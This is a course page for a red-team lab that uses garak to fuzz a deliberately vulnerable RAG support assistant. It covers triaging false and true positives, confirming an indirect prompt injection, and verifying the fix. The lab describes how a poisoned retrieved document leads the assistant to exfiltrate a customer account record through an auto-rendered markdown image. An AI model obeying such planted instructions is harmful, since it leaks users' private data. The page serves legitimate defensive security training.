Fuzz an LLM App with garak: Run, Read, and Triage True vs False Positives
Hosted · ide
Beta

Run NVIDIA garak as an automated fuzzer against a real vulnerable RAG support assistant, read the JSONL run log and the per-probe DEFCON report, then practice the skill that separates a scanner operator from a red teamer: triaging the hits. Dismiss a detector false positive with evidence, confirm a genuine indirect prompt injection against an in-pod exfil listener, and watch the finding regress to zero after the fix ships.

90 min · 8 steps · 3 domains · Advanced

[Interactive diagram: Map the attack surface. Stages shown: Query, Retriever, LLM, Answer, with a poisoned doc arriving as a retrieved chunk. Readout: attack-success rate (attacks blocked, benign answers pass), graded on real output, not the model's talk.]

What you'll learn

  1. Recon: stand up the vulnerable target behind an OpenAI endpoint
     You are automating red-team testing of DV-RAG-Support, ACME Cloud's …
  2. Run the scan: fire a broad garak discovery battery at the endpoint
     garak runs a battery of probes (attack generators) against a generator and …
  3. Read the report: count hits per probe and grade the run
     A garak run produces several artifacts: …
  4. Triage a false positive: dismiss a detector hit with evidence
     Scanners over-report. The triage skill is asking, for every hit, "did the …
  5. Confirm a true positive: run the custom probe, prove the effect on the listener
     A true positive is confirmed by reproducing the effect, not by trusting a …
  6. Harden the render sink: allow-list the one channel the finding rode out on
     Switch hats. You confirmed a genuine finding in step 5, so now you ship the fix.
  7. Distrust the retrieved context: reframe context as data, never instructions
     The render allow-list from step 6 is the load-bearing fix: it closes the exfil …
  8. Verify the regression: fixed = 0 findings, reintroduced = re-trips
     A fix only counts when you re-run the exact confirmed attack and watch it fail.
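
The render allow-list in step 6 can be sketched as below. This is a minimal illustration under stated assumptions, not the lab's actual fix: the function name `strip_untrusted_images`, the `ALLOWED_IMAGE_HOSTS` set, and the host name in it are all hypothetical. It assumes the exfil channel is an inline markdown image and drops any image whose host is not on the list.

```python
import re
from urllib.parse import urlparse

# Hypothetical allow-list: the only hosts the UI may fetch images from.
ALLOWED_IMAGE_HOSTS = {"static.acme-cloud.example"}

# Inline markdown image: ![alt](url "optional title")
MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)')

def strip_untrusted_images(markdown: str) -> str:
    """Replace images on non-allow-listed hosts with a text placeholder."""
    def _replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # trusted host: keep the image untouched
        # Untrusted or relative URL: drop it so the client never fetches it.
        return f"[image removed: {alt}]"
    return MD_IMAGE.sub(_replace, markdown)

print(strip_untrusted_images("Hi ![x](http://evil.example/p.png?d=secret) there"))
```

Re-running the confirmed attack through a filter like this is one way to picture step 8: the same payload that leaked before should now produce no outbound request. Reference-style images and raw HTML are not covered by this sketch.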

Prerequisites

  • Comfortable reading Python and JSON
  • Completed (or understand) Module 2 indirect prompt injection
  • No ML background required

Exam domains covered

Offensive AI Security · LLM Application Security · Red-Team Automation

Skills & technologies you'll practice

This advanced-level AI/ML lab gives you real-world reps across:

garak · Fuzzing · Red-Team Automation · Triage · False Positives · Indirect Prompt Injection · OWASP LLM01 · AI Red Team

What you'll do in this lab

This is a hands-on red-team automation lab. You point NVIDIA garak, a batteries-included LLM fuzzer and scanner, at a real Retrieval-Augmented Generation (RAG) support assistant called DV-RAG-Support and run a battery of attack probes against it. garak fires predefined attack prompts, scores each response with detectors, and writes a JSONL run log plus a per-probe DEFCON grade. Your job is the part a scanner cannot do for you: read the run and triage every hit, separating a genuine finding from a detector that merely pattern-matched.
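
Counting hits per probe from the JSONL run log might look like the sketch below. It rests on an assumption about the log layout: that summary records carry `"entry_type": "eval"` with `probe`, `detector`, `passed`, and `total` fields. Check these names against your own run log before relying on them. The sample records and probe names are hypothetical, not real garak output.

```python
import json
from collections import defaultdict

# Hypothetical sample lines; a real run log has more entry types and fields.
SAMPLE_REPORT = """\
{"entry_type": "eval", "probe": "probe_a.Example", "detector": "detector_x.Match", "passed": 8, "total": 10}
{"entry_type": "eval", "probe": "probe_b.Example", "detector": "detector_y.Match", "passed": 10, "total": 10}
{"entry_type": "attempt", "probe_classname": "probe_a.Example"}
"""

def hits_per_probe(lines):
    """Return {probe: (hits, total)} summed over that probe's eval entries."""
    totals = defaultdict(lambda: [0, 0])
    for line in lines:
        line = line.strip()
        if not line:
            continue
        entry = json.loads(line)
        if entry.get("entry_type") != "eval":
            continue  # skip per-attempt and setup records
        # Assumed semantics: "passed" counts responses the detector did NOT flag.
        totals[entry["probe"]][0] += entry["total"] - entry["passed"]
        totals[entry["probe"]][1] += entry["total"]
    return {probe: tuple(counts) for probe, counts in totals.items()}

summary = hits_per_probe(SAMPLE_REPORT.splitlines())
for probe, (hits, total) in sorted(summary.items()):
    print(f"{probe}: {hits}/{total} responses flagged")
```

A count like this only tells you where to look. Each flagged response still needs to be read and triaged.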

You will dismiss a detector false positive with evidence from the run log, then confirm a genuine true positive the right way, by reproducing the effect against an in-pod exfil listener rather than trusting a detector score. The confirmed finding is an indirect prompt injection (OWASP LLM01) that leaks a customer's account record through an auto-rendered markdown image (OWASP LLM05 improper output handling), the same channel behind the real EchoLeak exploit. You finish by shipping the fix and re-running the battery to watch the finding regress to zero, the regression discipline a real red-team practice is built on.
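
Confirming the effect on the listener, rather than trusting a detector score, could be sketched like this. The log format (one `<METHOD> <request-target> ...` line per request), the function name `leaked_requests`, and the canary value are assumptions for illustration; the lab's listener may log differently.

```python
from urllib.parse import urlsplit, parse_qsl

def leaked_requests(listener_log: str, canary: str) -> list[str]:
    """Return request targets from the log whose query string carries the canary."""
    found = []
    for line in listener_log.splitlines():
        parts = line.split()
        # Assumed log format: "<METHOD> <request-target> ..." on each line.
        if len(parts) < 2:
            continue
        target = parts[1]
        query = urlsplit(target).query
        # parse_qsl percent-decodes values, so an encoded canary still matches.
        if any(canary in value for _, value in parse_qsl(query)):
            found.append(target)
    return found

# Hypothetical log: one image fetch carrying account data, one unrelated request.
log = "GET /px.png?d=acct%3DACME-0042 HTTP/1.1\nGET /favicon.ico HTTP/1.1\n"
print(leaked_requests(log, "ACME-0042"))
```

A non-empty result means the record actually left the application, which is the evidence a true positive needs. An empty result after the fix is the regression check.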

Frequently asked questions

What is garak?

garak is NVIDIA's open-source LLM vulnerability scanner. You point it at a generator (a model or an LLM application behind an API), it runs predefined probes (attack generators), and detectors score each response. It is the discovery and fuzzing tool in a red-team toolkit: broad and opinionated, and it reports heuristic hits that you then triage.

What is the difference between a true and a false positive here?

A false positive is when a detector flags a response that did not actually achieve the attacker's goal: the model refused, or just quoted the payload, and a string-match detector counted it anyway. A true positive is a hit you can reproduce as a real effect. In this lab the true positive is an account record exfiltrating to an in-pod listener, which you confirm by reading the listener log, not by trusting a detector score.
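
The over-reporting described above can be illustrated with a toy string-match detector. Everything here is hypothetical: the trigger string, the refusal markers, and the function names are stand-ins, not garak's detectors. The sketch only shows why a response that refuses while quoting the payload still counts as a hit for a naive matcher.

```python
TRIGGER = "I have been PWNED"  # hypothetical string a probe tries to elicit

# Hypothetical refusal phrases; real triage means reading the whole response.
REFUSAL_MARKERS = ("i can't", "i cannot", "i won't", "not able to")

def string_match_detector(response: str) -> bool:
    """Naive detector: a hit whenever the trigger appears anywhere in the text."""
    return TRIGGER.lower() in response.lower()

def triage(response: str) -> str:
    """Label a response 'no hit', 'likely false positive', or 'needs reproduction'."""
    if not string_match_detector(response):
        return "no hit"
    if any(marker in response.lower() for marker in REFUSAL_MARKERS):
        # The model quoted the payload while declining: the attack did not fire.
        return "likely false positive"
    return "needs reproduction"

print(triage('I cannot comply with the request to say "I have been PWNED".'))
print(triage("I have been PWNED"))
```

The "needs reproduction" label is deliberate: a detector match without a refusal is still only a candidate until the effect is reproduced.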

Do I need a machine-learning background?

No. You read Python and JSON and reason about whether an attack actually fired. Everything model-specific is explained inline. The point of the lab is triage judgment and regression discipline, not model internals.